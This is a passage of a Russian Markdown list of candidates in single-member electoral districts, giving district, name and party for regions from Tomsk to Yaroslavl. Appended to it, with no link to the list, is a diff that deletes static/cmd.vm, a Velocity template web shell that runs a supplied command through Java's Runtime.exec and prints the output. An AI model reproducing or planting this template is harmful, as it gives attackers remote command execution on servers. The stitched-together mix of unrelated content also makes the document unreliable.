| 182 Томская область – Обский | Немцева Галина Григорьевна | Справедливая Россия — Патриоты — За правду |


# <a id="Тульская"></a>Тульская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 183 Тульская область – Тульский | Косарева Татьяна Геннадьевна | КПРФ |
| 184 Тульская область – Новомосковский | Исаков Владимир Павлович | КПРФ |


# <a id="Тюменская"></a>Тюменская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 185 Тюменская область – Тюменский | Трубин Глеб Александрович | ЛДПР |
| 186 Тюменская область – Заводоуковский | Левченко Иван Григорьевич | КПРФ |


# <a id="Удмуртская"></a>Удмуртская Республика

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 33 Удмуртская Республика – Удмуртский | Сыров Александр Юрьевич | КПРФ |
| 34 Удмуртская Республика – Ижевский | Бодров Владимир Петрович | КПРФ |


# <a id="Ульяновская"></a>Ульяновская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 187 Ульяновская область – Ульяновский | Кузин Виталий Иванович | КПРФ |
| 188 Ульяновская область – Радищевский | Гибатдинов Айрат Минерасихович | КПРФ |


# <a id="Хабаровский"></a>Хабаровский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 69 Хабаровский край – Хабаровский | Перевезенцев Петр Владимирович | КПРФ |
| 70 Хабаровский край – Комсомольский | Плюснин Антон Сергеевич | Справедливая Россия — Патриоты — За правду |


# <a id="Ханты-Мансийский"></a>Ханты-Мансийский автономный округ

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 222 Ханты-Мансийский автономный округ – Югра – Ханты-Мансийский | Клишин Александр Сергеевич | Справедливая Россия — Патриоты — За правду |
| 223 Ханты-Мансийский автономный округ – Югра – Нижневартовский | Марков Евгений Владимирович | ЛДПР |


# <a id="Челябинская"></a>Челябинская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 189 Челябинская область – Челябинский | Швецов Василий Георгиевич | Справедливая Россия — Патриоты — За правду |
| 190 Челябинская область – Металлургический | Ларин Дмитрий Сергеевич | Справедливая Россия — Патриоты — За правду |
| 191 Челябинская область – Коркинский | Гартунг Валерий Карлович | Справедливая Россия — Патриоты — За правду |
| 192 Челябинская область – Магнитогорский | Байтенов Дамир Акылбекович | ЛДПР |
| 193 Челябинская область – Златоустовский | Логинов Павел Васильевич | Справедливая Россия — Патриоты — За правду |


# <a id="Чеченская"></a>Чеченская Республика

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 36 Чеченская республика – Чеченский | Дениев Хасмагомед Хамбиевич | КПРФ |


# <a id="Чувашская"></a>Чувашская Республика

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 37 Чувашская Республика – Чувашия – Канашский | Андреев Александр Михайлович | КПРФ |
| 38 Чувашская Республика – Чувашия – Чебоксарский | Моляков Игорь Юрьевич | Справедливая Россия — Патриоты — За правду |


# <a id="Чукотский"></a>Чукотский автономный округ

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 224 Чукотский автономный округ – Чукотский | Бутакова Юлия Сергеевна | ЛДПР |


# <a id="Ямало-Ненецкий"></a>Ямало-Ненецкий автономный округ

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 225 Ямало-Ненецкий автономный округ – Ямало-Ненецкий | Вершинин Иван Сергеевич | ЛДПР |


# <a id="Ярославская"></a>Ярославская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 194 Ярославская область – Ярославский | Лисицын Анатолий Иванович | Справедливая Россия — Патриоты — За правду |
| 195 Ярославская область – Ростовский | Грешневиков Анатолий Николаевич | Справедливая Россия — Патриоты — За правду |

D static/cmd.vm => static/cmd.vm +0 -9
@@ 1,9 0,0 @@
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end
\ No newline at end of file